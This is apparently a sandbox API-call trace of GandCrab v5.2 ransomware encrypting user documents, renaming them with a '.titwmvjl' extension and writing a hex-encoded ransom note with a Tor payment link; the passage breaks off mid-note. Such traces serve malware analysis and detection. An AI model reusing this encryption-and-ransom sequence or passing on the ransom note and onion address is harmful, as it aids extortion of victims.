CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.536] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0090.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.537] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.537] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.537] GetLastError () returned 0x0 [0090.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.537] CryptDestroyKey (hKey=0x503738) returned 1 [0090.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.537] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.537] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.538] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.538] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x17c8f, lpOverlapped=0x0) returned 1 [0090.547] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffe8371, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.548] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17c8f, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x17c8f, lpOverlapped=0x0) returned 1 [0090.549] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0090.550] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.554] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.554] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.554] CloseHandle (hObject=0x2d4) returned 1 [0090.555] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\mgfirqswdr.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\mgfirqswdr.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0090.619] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.619] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.619] lstrcmpW (lpString1="piHuZRAz9dNWq", lpString2=".") returned 1 [0090.619] lstrcmpW (lpString1="piHuZRAz9dNWq", lpString2="..") returned 1 [0090.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="piHuZRAz9dNWq" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq" [0090.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\" [0090.619] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0090.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.620] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0090.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.620] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0090.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.620] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0090.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.620] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0090.620] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.620] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.621] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\\\TITWMVJL-DECRYPT.txt") returned 132 [0090.621] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0090.621] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\